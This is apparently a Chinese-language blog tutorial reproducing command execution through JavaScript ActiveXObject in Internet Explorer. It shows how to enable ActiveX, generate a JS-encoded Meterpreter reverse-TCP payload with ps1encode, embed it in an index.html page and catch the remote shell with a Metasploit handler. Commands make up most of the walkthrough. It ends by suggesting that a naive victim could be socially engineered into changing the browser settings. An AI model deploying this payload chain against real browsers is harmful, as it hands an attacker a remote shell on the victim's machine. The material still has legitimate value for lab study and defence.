JavsScript是可以通过创建ActiveXObject来执行命令,但是基本上不会存在,因为需要一定的设置且使用ie浏览器打开

漏洞复现设置

默认是没有开启ActiveX控件的,那么我们可以自己设置

image_1dsrj1kpt1ru5ncn1gmpa7s2hp.png-118.4kB

复现过程

这里用js反弹shell

下载工具:
https://github.com/CroweCybersecurity/ps1encode

使用如下命令生成反弹shelljs代码

1
./ps1encode.rb --LHOST 192.168.31.133 --LPORT 6666 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

image_1dsrjbg326pj1dd61fps31fimf16.png-184.5kB

然后把他放到index.html页面,代码如下

1
<script type="text/javascript">
2
	
3
	生成的js代码
4
5
</script>

然后在msf上面监听

1
msf5 > use exploit/multi/handler
2
msf5 exploit(multi/handler) > set LHOST 192.168.31.133
3
LPORT => 192.168.31.133
4
msf5 exploit(multi/handler) > set LPORT 6666
5
LPORT => 6666

image_1dsrjgsu3cpnj5nl96letqj31j.png-293.6kB

然后在ie浏览器上打开index.html页面,在msf就成功接收到反弹过来的shell

image_1dsrjj69j12lhifaap21q7ijuo2g.png-163.6kB

如果对方足够傻的情况下,是可以利用社工完成这些设置操作步骤的,但是如果真够傻的话往常直接丢exe给他更好。